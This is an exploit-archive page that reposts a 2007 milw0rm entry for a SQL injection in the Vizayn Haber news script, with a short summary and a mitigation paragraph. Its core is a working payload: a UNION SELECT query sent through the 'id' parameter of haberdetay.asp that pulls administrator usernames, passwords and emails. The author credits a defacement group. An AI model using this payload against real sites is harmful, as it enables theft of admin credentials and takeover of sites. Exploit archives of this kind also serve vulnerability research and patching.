Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Vizayn Haber (tr) == (tr) SQL Injection Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
Vizayn Haber
by:
chernobiLe
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Vizayn Haber
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Vizayn Haber (tr) == (tr) SQL Injection Vulnerability

The Vizayn Haber website is vulnerable to SQL Injection. An attacker can inject malicious SQL code through the 'id' parameter in the 'haberdetay.asp' file. This allows the attacker to retrieve sensitive information such as admin usernames, passwords, and email addresses.

Mitigation:

To mitigate this vulnerability, the website should implement proper input validation and parameterized queries to prevent SQL Injection attacks. Regular security audits and penetration testing can also help in identifying and resolving such vulnerabilities.
Source

Exploit-DB raw data:

###############################################################
#Vizayn Haber (tr) == (tr) SQL Injection Vulnerability
#Author : chernobiLe
#Site : www.cyber-sabotage.org , www.chernobiLe.com
#Contact: info@cyber-sabotage.org
###############################################################
#Risk : High
#Download Link Of Vizayn Haber : http://aspindir.com/goster/4623


#Exploit;
#Admin Nick, Passport, Mail;
http://[SITE]/haberdetay.asp?id=1+union+select+0,PASSWORD,EMAIL,USERNAME+from+ADMIN

#Union data Text;
#Haber Eklenme Tarihi :  USERNAME
#Haber Basligi :               PASSWORD

#Greetz: All CSDT ( Cyber Sabotage and Defacer ) TEAM

# milw0rm.com [2007-01-01]